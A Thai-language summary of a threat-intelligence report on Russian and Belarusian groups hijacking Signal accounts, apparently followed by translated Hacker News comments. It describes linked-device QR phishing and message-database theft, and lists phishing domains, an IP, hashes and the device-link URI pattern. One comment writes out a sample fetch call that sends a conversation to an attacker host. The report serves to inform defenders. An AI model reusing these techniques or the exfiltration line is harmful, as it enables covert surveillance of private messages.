ผู้ก่อภัยคุกคามที่เชื่อมโยงกับรัสเซียมุ่งโจมตี Signal Messenger อย่างแข็งขัน
(cloud.google.com)- บัญชี Signal ที่ใช้โดยเป้าหมายซึ่งหน่วยข่าวกรองรัสเซียให้ความสนใจกำลังถูกเพ่งเล็งอย่างหนัก และมีความพยายามเจาะบัญชีเพิ่มขึ้นเพื่อมุ่งเข้าถึงการสื่อสารที่ละเอียดอ่อนของรัฐบาลและกองทัพ
- วิธีที่ถูกใช้แพร่หลายที่สุดคือการใช้ฟีเจอร์ Linked Devices ที่ถูกต้องตามปกติในทางที่ผิด โดยหลอกให้สแกน QR code อันตราย จากนั้นซิงก์ข้อความไปยังอุปกรณ์ของผู้โจมตีแบบเรียลไทม์
- UNC5792 มุ่งใช้คำเชิญกลุ่ม Signal ปลอม, UNC4221 ใช้ phishing kit ธีม Kropyva และการแจ้งเตือนความปลอดภัยปลอม ส่วน APT44 มุ่งเชื่อมต่ออุปกรณ์ผ่านการเข้าถึงอุปกรณ์ที่ยึดมาได้
- APT44, Turla และ UNC1151 ที่เชื่อมโยงกับเบลารุส ยังใช้ความสามารถในการขโมย ฐานข้อมูล Signal หรือข้อความและไฟล์แนบของ Signal Desktop บนสภาพแวดล้อม Android และ Windows ด้วย
- ปัญหานี้ไม่ได้จำกัดอยู่แค่ Signal เพราะ WhatsApp และ Telegram ก็ตกเป็นเป้าในลักษณะคล้ายกัน จึงจำเป็นต้องอัปเดตแอป ตรวจสอบอุปกรณ์ที่เชื่อมต่อ ระวัง QR code และใช้การล็อกหน้าจอที่แข็งแรง
กิจกรรมที่เชื่อมโยงกับรัสเซียซึ่งมุ่งโจมตีบัญชี Signal
- Google Threat Intelligence Group(GTIG) ยืนยันว่าผู้ก่อภัยคุกคามหลายรายที่เชื่อมโยงกับรัฐรัสเซียได้เพิ่มความพยายามในการเจาะบัญชี Signal Messenger
- เป้าหมายหลักคือบุคคลที่อยู่ในความสนใจของหน่วยข่าวกรองรัสเซีย และหลังจากการรุกรานยูเครนอีกครั้ง ความต้องการในช่วงสงครามเพื่อเข้าถึงการสื่อสารที่ละเอียดอ่อนของรัฐบาลและกองทัพได้ทำให้กิจกรรมเพิ่มขึ้น
- Signal เป็น secure messenger ที่ทหาร นักการเมือง ผู้สื่อข่าว นักเคลื่อนไหว และชุมชนที่มีความเสี่ยงสูงใช้งาน จึงกลายเป็น เป้าหมายมูลค่าสูง สำหรับกิจกรรมเฝ้าระวังและข่าวกรอง
- ภัยคุกคามลักษณะเดียวกันยังขยายไปยัง messenger ยอดนิยมอื่นๆ เช่น WhatsApp และ Telegram โดยกลุ่มที่เชื่อมโยงกับรัสเซียใช้เทคนิคคล้ายกัน
- Signal รุ่นล่าสุดบน Android และ iOS มีฟีเจอร์เสริมความแข็งแกร่งที่ช่วยป้องกันแคมเปญ phishing ลักษณะนี้
- ผู้ใช้ต้อง อัปเดต เป็นเวอร์ชันล่าสุดจึงจะใช้ฟีเจอร์ดังกล่าวได้
วิธีการใช้ฟีเจอร์ Linked Devices ในทางที่ผิด
- เทคนิคที่ใหม่ที่สุดและถูกใช้แพร่หลายที่สุดคือการใช้ฟีเจอร์ปกติของ Signal อย่าง linked devices ในทางที่ผิด
- Signal มักต้องให้ สแกน QR code เมื่อเชื่อมต่ออุปกรณ์เพิ่มเติม เพื่อให้ใช้งานพร้อมกันได้หลายอุปกรณ์
- ผู้ก่อภัยคุกคามสร้าง QR code อันตราย ที่เมื่อเหยื่อสแกนแล้วจะเชื่อมต่อ instance ของ Signal ที่ผู้โจมตีควบคุมเข้ากับบัญชีของเหยื่อ
- เมื่อเชื่อมต่อสำเร็จ ข้อความหลังจากนั้นจะถูกซิงก์และส่งถึงทั้งเหยื่อและผู้โจมตีแบบเรียลไทม์ ทำให้ยังคงแอบดูบทสนทนาที่ปลอดภัยได้โดยไม่ต้องเจาะอุปกรณ์ทั้งหมด
- ในการ phishing ระยะไกล QR code อันตรายมักถูกปลอมแปลงเป็นสิ่งต่อไปนี้
- คำเชิญเข้ากลุ่ม Signal
- การแจ้งเตือนความปลอดภัย
- คำแนะนำการ pair อุปกรณ์ตามปกติบนเว็บไซต์ Signal
- ใน remote phishing ที่ปรับแต่งเฉพาะเป้าหมายมากขึ้น QR code สำหรับเชื่อมต่ออุปกรณ์อันตรายถูกฝังอยู่ในหน้า phishing ที่ดูเหมือนแอปพลิเคชันเฉพาะทางที่กองทัพยูเครนใช้งาน
- วิธีเดียวกันนี้ยังถูกใช้ในปฏิบัติการที่ต้องเข้าถึงใกล้ตัวด้วย
- APT44 ทำให้ทหารรัสเซียที่ประจำการในสนามรบสามารถเชื่อมต่อบัญชี Signal บนอุปกรณ์ที่ยึดมาได้เข้ากับโครงสร้างพื้นฐานที่ผู้โจมตีควบคุม เพื่อนำไปใช้ประโยชน์ต่อไป
- การเจาะบัญชีผ่านอุปกรณ์ที่เชื่อมต่อใหม่มักกลายเป็น ช่องทางเข้าถึงระยะแรกที่มีสัญญาณต่ำ เพราะขาดการตรวจจับและการป้องกันบนฐานเทคโนโลยีแบบรวมศูนย์
- หากสำเร็จ มีความเสี่ยงสูงที่การถูกเจาะจะไม่เป็นที่สังเกตเป็นเวลานาน
UNC5792: คำเชิญกลุ่ม Signal ที่ถูกดัดแปลง
- UNC5792 เป็นคลัสเตอร์ที่ต้องสงสัยว่าเกี่ยวข้องกับกิจกรรมจารกรรมของรัสเซีย และมีบางส่วนทับซ้อนกับ UAC-0195 ของ CERT-UA
- กลุ่มนี้ดัดแปลงหน้า group invite ปกติของ Signal เพื่อใช้ในแคมเปญ phishing
- ใน flow ปกติ ผู้ใช้จะถูก redirect ไปยังกลุ่ม Signal แต่หน้าที่ถูกดัดแปลงจะส่งเหยื่อไปยัง URL อันตรายที่เชื่อมต่ออุปกรณ์ที่ผู้โจมตีควบคุมเข้ากับบัญชี Signal ของเหยื่อ
- โครงสร้างพื้นฐานที่ผู้โจมตีควบคุมถูกจัดทำให้ดูเหมือนคำเชิญกลุ่ม Signal ที่ถูกต้องตามกฎหมาย
- JavaScript ของคำเชิญกลุ่มปลอมถูกแทนที่จากการ redirect เพื่อเข้าร่วมกลุ่ม Signal แบบทั่วไป เป็นบล็อกอันตรายที่มี URI สำหรับเชื่อมต่ออุปกรณ์ Signal ใหม่ในรูปแบบ
sgnl://linkdevice?uuid= - พบโดเมนตัวอย่างคือ
signal-groups[.]tech
UNC4221: Signal phishing kit แบบปรับแต่งเฉพาะ
- UNC4221 เป็นผู้ก่อภัยคุกคามที่เชื่อมโยงกับรัสเซีย ซึ่ง CERT-UA ติดตามในชื่อ UAC-0185 และมุ่งเป้าอย่างแข็งขันไปยังบัญชี Signal ที่ทหารยูเครนใช้
- กลุ่มนี้ใช้ Signal phishing kit แบบปรับแต่งเฉพาะที่ดูเหมือนส่วนประกอบของแอปพลิเคชัน Kropyva ซึ่งกองทัพยูเครนใช้สำหรับชี้นำปืนใหญ่
- UNC4221 ก็ซ่อน ฟังก์ชันเชื่อมต่ออุปกรณ์ ให้ดูเหมือนคำเชิญกลุ่ม Signal จากผู้ติดต่อที่น่าเชื่อถือ คล้ายกับ UNC5792
- phishing kit รุ่นต่างๆ ที่พบมีหลายรูปแบบ
- เว็บไซต์ phishing ที่ redirect เหยื่อไปยังโครงสร้างพื้นฐาน phishing ชั้นที่สอง ซึ่งดูเหมือนคำแนะนำการเชื่อมต่ออุปกรณ์ปกติที่ Signal จัดให้
- เว็บไซต์ที่ฝัง QR code เชื่อมต่ออุปกรณ์อันตรายลงใน phishing kit ธีม Kropyva พื้นฐานโดยตรง
- หน้า phishing ที่สร้างให้ดูเหมือนการแจ้งเตือนความปลอดภัยปกติของ Signal ในปฏิบัติการช่วงต้นปี 2022
- โดเมนและหน้าตัวอย่าง ได้แก่
signal-confirm[.]site,teneta.add-group[.]site,signal-protect[.]hostเป็นต้น - UNC4221 ยังใช้ payload JavaScript ขนาดเบาชื่อ PINPOINT เป็นองค์ประกอบหลักของการมุ่งโจมตี Signal
- PINPOINT เก็บข้อมูลผู้ใช้พื้นฐานและข้อมูลตำแหน่งด้วย GeoLocation API ของเบราว์เซอร์
- ในปฏิบัติการลักษณะคล้ายกันในอนาคต มีความเป็นไปได้สูงว่าทั้งข้อความที่ปลอดภัยและข้อมูลตำแหน่งจะถูกเล็งพร้อมกัน
- โดยเฉพาะในบริบทของปฏิบัติการเฝ้าระวังเป้าหมายหรือการสนับสนุนปฏิบัติการทหารแบบดั้งเดิม ข้อมูลทั้งสองประเภทนี้จะถูกมุ่งโจมตีร่วมกัน
กิจกรรมที่เชื่อมโยงกับรัสเซียและเบลารุสเพื่อขโมยข้อความ Signal
- นอกจากวิธีเชื่อมต่ออุปกรณ์เพิ่มเติมเข้ากับบัญชีเหยื่อแล้ว ผู้ก่อภัยคุกคามในภูมิภาคที่เป็นที่รู้จักหลายรายยังใช้ความสามารถในการขโมย ไฟล์ฐานข้อมูล Signal จากอุปกรณ์ Android และ Windows
- APT44 ใช้ Windows Batch script ขนาดเบาชื่อ WAVESIGN
- สืบค้นข้อความ Signal จากฐานข้อมูล Signal ของเหยื่อเป็นระยะ
- ส่งออกข้อความล่าสุดด้วย Rclone
- มัลแวร์ Android Infamous Chisel ที่ Security Service of Ukraine(SSU) ของยูเครน และ National Cyber Security Centre(NCSC) ของสหราชอาณาจักรรายงานในปี 2023 ถูก attribution ไปยัง Sandworm
- มัลแวร์นี้ถูกออกแบบให้ค้นหาแบบ recursive ตามรายการนามสกุลไฟล์ เช่น ฐานข้อมูลในเครื่องของแอป messenger หลายตัวรวมถึง Signal บนอุปกรณ์ Android
- Turla เป็นผู้ก่อภัยคุกคามรัสเซียที่ถูก attribution ไปยัง FSB Center 16 ของรัสเซีย
- หลังการเจาะระบบ กลุ่มนี้ใช้ PowerShell script ขนาดเบาในสภาพแวดล้อม Windows เพื่อเตรียมนำข้อความ Signal Desktop ออกไป
- UNC1151 ที่เชื่อมโยงกับเบลารุสใช้ utility บรรทัดคำสั่ง Robocopy
- ทำการ staging เนื้อหาในไดเรกทอรีไฟล์ที่ Signal Desktop ใช้เก็บข้อความและไฟล์แนบ เพื่อให้ส่งออกได้ในภายหลัง
มาตรการป้องกันสำหรับผู้ใช้ secure messenger
- การที่ผู้ก่อภัยคุกคามหลายรายมุ่งเป้าไปที่ Signal แสดงให้เห็นว่าภัยคุกคามต่อแอปพลิเคชัน secure messenger อาจทวีความรุนแรงขึ้นในระยะสั้น
- เมื่อประกอบกับการเติบโตของอุตสาหกรรม spyware เชิงพาณิชย์ และการเพิ่มขึ้นของสายพันธุ์มัลแวร์มือถือที่ใช้ในพื้นที่ขัดแย้ง ความต้องการศักยภาพไซเบอร์เชิงรุกเพื่อเฝ้าระวังการสื่อสารที่ละเอียดอ่อนก็เพิ่มสูงขึ้น
- ภัยคุกคามไม่ได้หยุดอยู่แค่ปฏิบัติการไซเบอร์ระยะไกล เช่น phishing และการส่งมัลแวร์
- ปฏิบัติการเข้าถึงใกล้ตัว ซึ่งผู้โจมตีสามารถเข้าถึงอุปกรณ์ที่ปลดล็อกอยู่ของเป้าหมายได้ชั่วครู่ ก็เป็นความเสี่ยงสำคัญเช่นกัน
- ไม่เพียง Signal เท่านั้น WhatsApp และ Telegram ก็รวมอยู่ในลำดับความสำคัญของเป้าหมายล่าสุดของหลายกลุ่มที่เชื่อมโยงกับรัสเซีย
- Microsoft Threat Intelligence กล่าวถึงแคมเปญที่ COLDRIVER, UNC4057 และ Star Blizzard พยายามใช้ฟีเจอร์ Linked Devices ในทางที่ผิดเพื่อเจาะบัญชี WhatsApp ใน บล็อกโพสต์ล่าสุด
- ผู้ใช้ที่อาจตกเป็นเป้าของกิจกรรมบุกรุกที่ได้รับการสนับสนุนจากรัฐควรนำพฤติกรรมป้องกันต่อไปนี้ไปใช้
- เปิดใช้ การล็อกหน้าจอ บนอุปกรณ์มือถือทุกเครื่อง และใช้รหัสผ่านที่ยาวและซับซ้อน โดยผสมตัวพิมพ์ใหญ่ ตัวพิมพ์เล็ก ตัวเลข และสัญลักษณ์
- Android รองรับรหัสผ่านแบบตัวอักษรและตัวเลข ซึ่งให้ความปลอดภัยสูงกว่า PIN ตัวเลขหรือ pattern มาก
- ติดตั้งการอัปเดตระบบปฏิบัติการให้เร็วที่สุดเท่าที่ทำได้ และคง Signal กับแอป messenger อื่นๆ ไว้เป็นเวอร์ชันล่าสุดเสมอ
- เปิด Google Play Protect ไว้บนอุปกรณ์ Android ที่มี Google Play Services ซึ่งโดยปกติจะเปิดใช้งานเป็นค่าเริ่มต้น
- ตรวจสอบส่วน “Linked devices” ในการตั้งค่าแอปเป็นประจำ ว่ามีอุปกรณ์ที่ไม่ได้รับอนุญาตหรือไม่
- ระวัง QR code และ web resource ที่ดูเหมือนการอัปเดตซอฟต์แวร์ คำเชิญกลุ่ม หรือการแจ้งเตือนอื่นๆ และเร่งให้ลงมือทันที
- หากทำได้ ให้ใช้การยืนยันตัวตน 2 ขั้นตอน เช่น ลายนิ้วมือ การจดจำใบหน้า security key หรือ one-time code เพื่อยืนยันการเข้าสู่ระบบบัญชีหรือการเชื่อมต่ออุปกรณ์ใหม่
- ผู้ใช้ iPhone ที่กังวลเรื่องการเฝ้าระวังเป้าหมายหรือกิจกรรมข่าวกรอง ควรพิจารณาเปิดใช้ Lockdown Mode เพื่อลด attack surface
สรุปตัวชี้วัดการถูกเจาะและเทคนิคที่พบ
- เพื่อช่วยองค์กรในการ hunting และการระบุ มีตัวชี้วัดการถูกเจาะอยู่ใน GTI Collection สำหรับผู้ใช้ที่ลงทะเบียน
- ตัวอย่างตัวชี้วัดการถูกเจาะที่เกี่ยวข้องมีดังนี้
- UNC5792:
e078778b62796bab2d7ab2b04d6b01bf, ตัวอย่างโค้ด HTML ของคำเชิญกลุ่มที่ถูกดัดแปลง - หน้า phishing คำเชิญกลุ่มปลอมของ UNC5792:
add-signal-group[.]com,add-signal-groups[.]com,group-signal[.]com,groups-signal[.]site,signal-device-off[.]online,signal-group-add[.]com,signal-group[.]site,signal-group[.]tech,signal-groups-add[.]com,signal-groups[.]site,signal-groups[.]tech,signal-security[.]online,signal-security[.]site,signalgroup[.]site,signals-group[.]com - หน้า phishing คำแนะนำการเชื่อมต่ออุปกรณ์ของ UNC4221:
signal-confirm[.]site,confirm-signal[.]site - การแจ้งเตือนความปลอดภัย Signal ปลอมของ UNC4221:
signal-protect[.]host - คำเชิญกลุ่ม Kropyva ปลอมของ UNC4221:
teneta.join-group[.]online,teneta.add-group[.]site,group-teneta[.]online,helperanalytics[.]ru,teneta[.]group,group.kropyva[.]site - APT44:
150.107.31[.]194:18000, QR code เชื่อมต่ออุปกรณ์ที่สร้างแบบ dynamic ซึ่ง APT44 จัดให้ - APT44 WAVESIGN Batch script:
a97a28276e4f88134561d938f60db495,b379d8f583112cad3cf60f95ab3a67fd,b27ff24870d93d651ee1d8e06276fa98
- UNC5792:
- กลยุทธ์และเทคนิคตามผู้ก่อภัยคุกคามที่พบมีดังนี้
- UNC5792: ใช้ remote phishing ด้วยคำเชิญกลุ่มปลอม เพื่อ pair ข้อความ Signal ของเหยื่อเข้ากับอุปกรณ์ที่ผู้โจมตีควบคุม
- UNC4221: ใช้ remote phishing ด้วย web application ทางทหารปลอมและการแจ้งเตือนความปลอดภัย เพื่อ pair ข้อความ Signal ของเหยื่อเข้ากับอุปกรณ์ที่ผู้โจมตีควบคุม
- APT44: ใช้อุปกรณ์ที่เข้าถึงทางกายภาพในทางที่ผิด เพื่อ pair ข้อความ Signal ของเหยื่อเข้ากับอุปกรณ์ที่ผู้โจมตีควบคุม
- APT44: ใช้มัลแวร์ Android Infamous Chisel เพื่อมุ่งขโมยไฟล์ฐานข้อมูล Signal
- APT44: ใช้ Windows Batch script เพื่อส่งออกข้อความ Signal ล่าสุดผ่าน Rclone เป็นระยะ
- Turla: ดำเนินกิจกรรมขโมยฐานข้อมูล Signal Desktop หลังเจาะสภาพแวดล้อม Windows
- UNC1151: ใช้ Robocopy เพื่อเตรียมไดเรกทอรีไฟล์ของ Signal Desktop สำหรับการนำออกไป
2 ความคิดเห็น
แม้จะมีช่องโหว่อยู่จริง แต่การที่ Telegram ซึ่งแม้แต่แชตกลุ่มก็ยังเข้ารหัสไม่ถูกต้อง มาวิจารณ์เรื่องความปลอดภัย มันก็น่าขำดีนะ
ความคิดเห็นใน Hacker News
แอปที่มี workflow สำหรับอุปกรณ์ที่เชื่อมต่อ แบบ Signal มีความเสี่ยงมานานพอสมควรแล้ว
ตอนที่ Telegram โจมตี Signal เมื่อปีที่แล้วก็ชี้ประเด็นนี้ไว้ (https://news.ycombinator.com/context?id=40303736) และผมมองว่าการใช้งานอุปกรณ์ที่เชื่อมต่อของ Signal มีปัญหามานานแล้ว: https://eprint.iacr.org/2021/626.pdf
ที่จริงกลับน่าแปลกใจที่ใช้เวลานานขนาดนี้กว่ากรณีโจมตีจริงจะปรากฏในเอกสารสาธารณะ การที่ Signal มองว่าการโจมตีนี้อยู่นอก threat model ของตัวเองก็ไม่ได้ช่วยอะไร ตามบทความดังกล่าว Signal ได้รับรายงานเมื่อวันที่ 20 ตุลาคม 2020 และตอบกลับเมื่อวันที่ 28 ตุลาคมว่า การรั่วไหลของ secret key ระยะยาว ไม่ได้ถูกรวมไว้ในโมเดลผู้โจมตีของตน
ถ้าอย่างนั้นก็ต้องมีการเข้าถึงทางกายภาพต่อหนึ่งในอุปกรณ์ของเหยื่อ หรือมี backdoor อื่นอยู่แล้ว ซึ่งถึงระดับนั้นก็น่าจะถือว่าแพ้ไปแล้วไม่ใช่หรือ ถ้าผมเข้าใจผิดช่วยแก้ให้ด้วย ความปลอดภัยของฮาร์ดแวร์ทางกายภาพและการป้องกันฟิชชิงยังดูเป็นหัวใจสำคัญ
วิธีที่จะได้มันมานอกแล็บโดยทั่วไปก็คือการได้สิทธิ์ root บนอุปกรณ์ของผู้ใช้ หรือขโมยข้อมูลสำรองแชตล่าสุด แคมเปญที่ Google ค้นพบนั้นใกล้เคียงกับฟิชชิงมากกว่า จึงร้ายแรงน้อยกว่าในเชิงเทคนิค แต่จะเตือนผู้ใช้อย่างไรว่าพวกเขากำลังทำสิ่งที่เสี่ยงอยู่นั้นเป็นปัญหายากที่เกี่ยวพันกับ usability security ทั้งหมด เรื่องนี้จะยิ่งสำคัญขึ้นใน Signal เมื่อการเพิ่มอุปกรณ์ที่เชื่อมต่อใหม่เริ่มคัดลอกประวัติข้อความและไฟล์แนบในช่วง 45 วันที่ผ่านมาไปด้วย
สิ่งที่รู้สึกมากขึ้นในช่วงนี้คือ สุดท้ายแล้ว การเข้ารหัสแบบต้นทางถึงปลายทาง จำเป็นต้องทำให้ผู้ใช้ปลายทางสามารถบิลด์และตรวจสอบไคลเอนต์ได้ด้วยตัวเอง
ผมกำลังทำบริการแชต AI ที่เข้ารหัสโดยใช้ CRDT แบบเข้ารหัสอยู่ แต่แค่ใส่
fetchบรรทัดเดียวหรือใส่ตัวติดตามวิเคราะห์ลงไปฝั่งเรนเดอร์ ความปลอดภัยที่โปรโตคอลสัญญาไว้ก็กลายเป็นไร้ความหมายแล้ว ยิ่งไปกว่านั้น ยังต้องเชื่อถือระบบปฏิบัติการที่ส่วนเรนเดอร์รันอยู่ด้วยต่อให้ทำไคลเอนต์เป็นโอเพนซอร์สและให้บิลด์แบบทำซ้ำได้ ก็ยังต้องเผยแพร่ผ่าน iOS Store และระหว่างกระบวนการเผยแพร่อะไรก็เกิดขึ้นได้ ที่ยก iOS เป็นตัวอย่างเพราะการนำแอปที่บิลด์เองขึ้นไปนั้นยุ่งยากเป็นพิเศษ ถ้าเป็นแชตหลายฝ่าย อีกฝ่ายก็ต้องผ่านกระบวนการเดียวกันด้วย
ต่อให้ใช้โปรโตคอลสวยหรูสารพัดและการเข้ารหัสช่วงการส่งข้อมูลที่ดีที่สุด สุดท้ายทั้งหมดก็เป็นเรื่องของ ความเชื่อถือ ผมกังวลว่าการใช้ของอย่าง Signal อาจทำให้คนเข้าใจผิดว่าอยู่ในสภาพแวดล้อมที่ปลอดภัยสมบูรณ์ แล้วกลับกลายเป็นเป้าหมายของการเฝ้าระวังเสียเอง หากหน่วยงานรัฐต้องการเฝ้าระวัง ก็น่าจะทุ่มทรัพยากรไปที่ผู้ใช้ Signal ซึ่งน่าจะมีสิ่งที่ต้องปกปิดมากที่สุด
บางครั้งรู้สึกว่านอกจากที่เก็บข้อมูลแบบเข้ารหัสแล้ว อย่างอื่นแทบไม่มีความหมาย แปลกด้วยที่การอภิปรายส่วนใหญ่หยุดอยู่ที่ความถูกต้องของโปรโตคอลความปลอดภัยเชิงคณิตศาสตร์ ทั้งที่แค่มี
fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>)", {body: JSON.stringify(convo)})บรรทัดเดียวในเลเยอร์เรนเดอร์ก็เลี่ยงได้หมดแล้ว อยากรู้ว่าคิดเรื่องนี้กันอย่างไรการกำจัดความเชื่อถือดูเป็นไปไม่ได้ เราเพียงย้ายสิ่งที่จะเชื่อถือ หรือซ่อนมันไว้หลัง abstraction เท่านั้น สิ่งที่จะยิ่งสำคัญขึ้นต่อไปคือกลไกที่ทำให้พิสูจน์ได้ชัดเจนและเอาผิดได้ว่า entity ที่เราเชื่อถือในระดับหนึ่งนั้นกระทำการโดยเจตนาร้ายหรือไม่
เช่น certificate transparency log ที่ป้องกันการโจมตีแบบคนกลาง, reproducible build ที่ตรวจสอบว่าไบนารีที่ได้รับตรงกับโค้ดโอเพนซอร์สสาธารณะหรือไม่, และ key transparency ที่ตรวจสอบว่าใน WhatsApp/Signal/iMessage เราได้รับ public key ที่คาดไว้ ไม่ใช่คีย์ของ NSA
ระบบที่พยายามปลอดภัยเกินไปอาจทำให้ผู้ใช้อ่านข้อความของตัวเองไม่ได้ และสุดท้ายผลักให้ไปใช้ระบบที่ปลอดภัยน้อยกว่า ใน Matrix ก็เคยมีปัญหาเพราะไคลเอนต์ไม่สามารถแจ้งให้ชัดเจนได้ว่า หากล็อกเอาต์แล้วอาจพลาดข้อความอย่างถาวร
ข้อกำหนดที่เข้มงวดบางอย่าง เช่น perfect forward secrecy อาจขัดแย้งในทางปฏิบัติกับสิ่งที่ผู้ใช้ต้องการจากการส่งข้อความ สิ่งที่ผู้ใช้ต้องการคือ “ฉันดูข้อความของฉันได้ทุกเมื่อ และคนอื่นไม่มีทางดูได้เด็ดขาด” ซึ่งทำได้ยากมาก มีความตึงเครียดพื้นฐานระหว่างความปลอดภัย การรีเซ็ตรหัสผ่าน และการกู้คืนเมื่อทำโทรศัพท์หาย
หากผู้คนเข้าใจผลลัพธ์ที่เป็นไปได้อย่างครบถ้วน จำนวนไม่น้อยอาจไม่ต้องการการเข้ารหัสแบบต้นทางถึงปลายทางที่แข็งแกร่งที่สุด แต่อาจต้องการหลักประกันทางกฎหมายที่แข็งแรง เช่น “ถ้าคนอื่นอ่านข้อความของฉัน ให้ติดคุกตลอดชีวิต” มีคนที่ต้องการความปลอดภัยทางเทคนิคระดับสูงสุดเช่นกัน แต่ถ้าออกแบบตามลำดับความสำคัญนั้น ก็อาจเกิดผลย้อนกลับกับผู้ใช้ที่ไม่ยอมรับการแลกเปลี่ยนดังกล่าว
คนที่ใส่ใจความปลอดภัยระดับนั้นคงพยายามใช้อย่างอื่นแทน iPhone การที่ผู้สนับสนุน Signal เรียกผู้ใช้ระบบเข้ารหัสที่ตนไม่ชอบว่า LARPer ดูเหมือนการโยนภาพตัวเองใส่คนอื่นแบบคลาสสิก ผมไม่ค่อยแน่ใจว่า threat model ที่ Signal เหมาะจริง ๆ คืออะไร นอกจากกรณีคนทำงานให้รัฐบาลสหรัฐฯ
ในแวดวงนักวิจัยคริปโตเชิงวิชาการก็มี ผลกระทบเสาไฟ ชัดเจน คือไปโฟกัสกับอัลกอริทึมทางคณิตศาสตร์ ทุกวันนี้ขอบเขตที่ขอทุนวิจัยด้านความปลอดภัยได้กว้างขึ้นบ้าง จนรวมถึงโมเดลของเล่นของโปรโตคอลส่งข้อความแบบต้นทางถึงปลายทาง แต่ก็ยังไม่พอจะครอบคลุมเส้นทางทั้งหมดจากมนุษย์ถึงมนุษย์ที่สำคัญจริง ๆ
โดยพื้นฐานคือให้รูทที่เชื่อถือได้ลงนาม เพื่อยืนยันโดยไม่ต้องสงสัยว่า entity ที่เราปฏิสัมพันธ์ด้วยมาจากโทรศัพท์+ระบบปฏิบัติการ+แอปแบบใด
Android มีสิ่งนี้อยู่ และตัวอย่างเช่นสามารถยืนยันให้บุคคลที่สามรู้ได้ว่ากำลังรัน bootloader ที่ล็อกอยู่ มีลายเซ็นของ Google และระบบปฏิบัติการของ Google ในทางทฤษฎี ยังเป็นไปได้ที่จะมีเชนความเชื่อถือแบบอื่น แล้วให้คู่สื่อสารระยะไกลยอมรับซอฟต์แวร์ “ต้นฉบับ” อย่างโทรศัพท์ Google + Lineage OS
แอปก็สามารถตรวจสอบลายเซ็นของแอปที่ระบบปฏิบัติการเข้าถึงได้ และส่งให้คู่สื่อสารระยะไกลหากจำเป็นได้เช่นกัน ผลลัพธ์การรับรองที่โปร่งใสอย่างสมบูรณ์ซึ่งไม่ต้องเชื่อถือ entity เดียวอย่าง Google อย่างมืดบอด อาจใช้ ledger ที่บรรจุแฮชและไบนารีของคอมโพเนนต์ที่ถูกตรวจสอบ แทนรากความเชื่อถือแบบลายเซ็นได้
ทั้งหมดเป็นไปได้ทางเทคนิค แต่ยังไม่ได้ถูกนำไปใช้งานในรูปแบบที่ทำได้จริงในปัจจุบัน หากมีความสนใจมากพอ สุดท้ายก็น่าจะมีการนำไปใช้
ตอนนั้นแทบไม่มีอะไรเข้ารหัสเลย การทำอะไรบน Wi-Fi สาธารณะก็ไม่ต่างจากการเล่นรัสเซียนรูเล็ต และหน่วยงานข่าวกรองสัญญาณก็อยู่ในยุคทอง ในเวลานั้น การเข้ารหัสเครือข่าย จึงมีลำดับความสำคัญสูงกว่า
ในบทความไม่ได้เขียนไว้อย่างชัดเจน แต่เท่าที่เข้าใจ ขั้นตอนแรกของการโจมตีหนึ่งคือการเอา สมาร์ตโฟนของทหารที่เสียชีวิต ไป
หากสำเร็จ ข้อความหลังจากนั้นจะถูกส่งถึงทั้งเหยื่อและผู้โจมตีแบบเรียลไทม์พร้อมกัน
แต่สมาร์ตโฟนก็มอบแพลตฟอร์มคอมพิวติ้งและการสื่อสารที่ทรงพลังให้ทหารทุกคนใช้ได้โดยแทบไม่ต้องฝึกเพิ่ม ปัญหาคือจะทำให้ปลอดภัยได้อย่างไร รวมถึงความเสี่ยงตามคอมเมนต์ด้านบนด้วย
น่าจะมีใครสักคนกำลังวิจัยวิธีป้องกันให้เพียงพอจนแม้แต่หน่วยข่าวกรองรัสเซียก็ใช้ประโยชน์ได้ไม่สำเร็จ หากวิธีแก้แบบนั้นแพร่หลาย ก็อาจนำไปใช้กับความเป็นส่วนตัวของพลเรือนได้ดีเช่นกัน การปกป้องโทรศัพท์ของพลเรือนยูเครนจากผู้โจมตีรัสเซียก็ไม่ใช่ความคิดที่แย่
ถ้าหมายถึงแค่สแกน QR code ครั้งเดียวก็เชื่อมต่ออุปกรณ์ได้แล้ว ผมว่ามันน่าจะเป็นช่องโหว่หรือเปล่า
ไม่ควรให้แค่สแกนโค้ดแล้วอุปกรณ์เชื่อมต่อได้ แต่ควรมี การยืนยันด้วยตนเอง เช่น “ใช่ ฉันจะเชื่อมต่อกับอุปกรณ์นี้” แบบนี้ถึงแม้ผู้ใช้จะสแกนเพราะคิดว่าเป็นโค้ดเชิญเข้ากลุ่ม ก็จะสังเกตได้ว่าจริง ๆ แล้วไม่ใช่ แน่นอนว่าสุดท้ายผู้ใช้ก็ยังต้องสังเกตเองอยู่ดี แต่นี่เป็นการปรับปรุงที่มีความหมายมากกว่า “นึกว่าเป็นโค้ดเข้าร่วมกลุ่มเลยสแกน แล้วจู่ ๆ ก็มีอุปกรณ์อื่นเชื่อมต่อแบบเงียบ ๆ”
ผู้ใช้จำนวนมากไม่เข้าใจและไม่ได้คิดลึกเรื่อง QR code, ลิงก์, การเชื่อมต่อ อะไรพวกนี้ พวกเขากดด้วยการเดาแบบทันทีและตามสัญชาตญาณ และบ่อยครั้งก็กดเพื่อให้มันหายไปจากหน้าจอแล้วกลับไปทำสิ่งที่ทำอยู่ ผมไม่รู้ว่ามีหลักฐานให้เชื่อได้ไหมว่าไม่มีขั้นตอนยืนยัน คงดูได้จากเอกสารของ Signal
บทความที่เกี่ยวข้อง: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
เห็นผ่าน https://news.ycombinator.com/item?id=43103692 แต่ที่นั่นไม่มีคอมเมนต์
ข่าวดีคือ มีเหตุผลที่มันตกเป็นเป้าหมาย นั่นหมายความว่า Signal ยังมีประสิทธิภาพอยู่
มีเสียงจำนวนมากพยายามจะบอกว่า Signal ถูกเจาะแล้ว แต่แทบทุกกรณีควรมองด้วยว่าฝั่งนั้นมีความเป็น โอเพนซอร์ส ต่ำกว่า Signal
Signal กำลังพยายามอย่างเต็มที่เพื่อปกป้องสิทธิมนุษยชน แม้จะกลายเป็นบริษัทระดับเว็บสเกลแล้วก็ตาม ศักดิ์ศรีของปัจเจกบุคคลเป็นเรื่องสำคัญ นี่ไม่ใช่แค่การสนทนาธรรมดา
ผมลองดูรายชื่อคณะกรรมการบนเว็บไซต์ Signal Foundation คร่าว ๆ แล้วเห็นคำอย่าง Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow, Foreign Affairs Policy Board ของ U.S. Department of State
